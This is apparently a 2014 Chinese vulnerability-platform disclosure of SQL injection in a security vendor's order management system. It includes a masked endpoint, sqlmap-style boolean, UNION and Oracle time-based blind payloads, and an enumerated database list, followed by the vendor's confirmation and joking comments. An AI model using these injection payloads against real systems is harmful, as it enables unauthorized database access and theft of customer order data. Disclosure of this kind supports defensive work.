网御星云第二集某重要业务系统爆出SQL注入Oracle数据库订单信息

网御星云的电子订单管理系统，可以爆sql注入。ORACLE数据库成功列出，随便找了个用户，破了md5加密，进入订单系统，所有订单一览无余。想问问你们，这个真的不重要吗，安全厂商……………………

给你看注入点：

http://**.**.**.**/agent/countryProvinceChange.htm?currTime=Tue%20Jul%2001%202014%2009:15:09%20GMT+0800

POST参数：province=11

Place: POST

Parameter: province

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: province=11' AND 7266=7266 AND 'mGhp'='mGhp

Type: UNION query

Title: Generic UNION query (NULL) - 2 columns

Payload: province=11' UNION ALL SELECT CHR(113)||CHR(102)||CHR(113)||CHR(110)||CHR(113)||CHR(98)||CHR(86)||CHR(103)||CHR(105)||CHR(121)||CHR(109)||CHR(103)||CHR(115)||CHR(108)||CHR(122)||CHR(113)||CHR(122)||CHR(101)||CHR(116)||CHR(113),NULL FROM DUAL--

Type: AND/OR time-based blind

Title: Oracle AND time-based blind (heavy query)

Payload: province=11' AND 6075=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'gnDr'='gnDr

---

[09:21:53] [INFO] the back-end DBMS is Oracle

web application technology: Nginx, JSP

back-end DBMS: Oracle

>>>>>>>>>>>>>>>>>>>DATABASES>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

[*] CTXSYS

[*] DBSNMP

[*] EC_LEADSEC

[*] EC_VENUS

[*] EXFSYS

[*] FLOWS_030000

[*] FLOWS_FILES

[*] HR

[*] IX

[*] MDSYS

[*] OE

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] PM

[*] SCOTT

[*] SH

[*] SOAU

[*] SPPROD

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TSMSYS

[*] WK_TEST

[*] WKSYS

[*] WMSYS

[*] XDB

你们是安全厂商呀。

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-07-11 12:04

厂商回复：

谢谢发现问题

最新状态：

暂无

1. 2014-07-05 21:14 | 草榴社区 ( 普通白帽子 | Rank:109 漏洞数:26 | Rank:9999 漏洞数:1024 | 未满18周岁,不准...)

   0

   网御星云--一个不安全的安全厂商 有才!

   1# 回复此人

2. 2014-07-07 12:32 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

   0

   草榴社区--一个1024的成人网站 有才!

   2# 回复此人

3. 2014-07-07 21:13 | Debug0man ( 路人 | Rank:8 漏洞数:1 | 叽叽呗呗...)

   0

   ...我竟无言以对...

   3# 回复此人

4. 2014-07-10 19:18 | Hero ( 普通白帽子 | Rank:162 漏洞数:53 | 药药切克闹,充气娃娃迷幻药)

   0

   乌云社区--一个万千基佬的安全领域 有才！

   4# 回复此人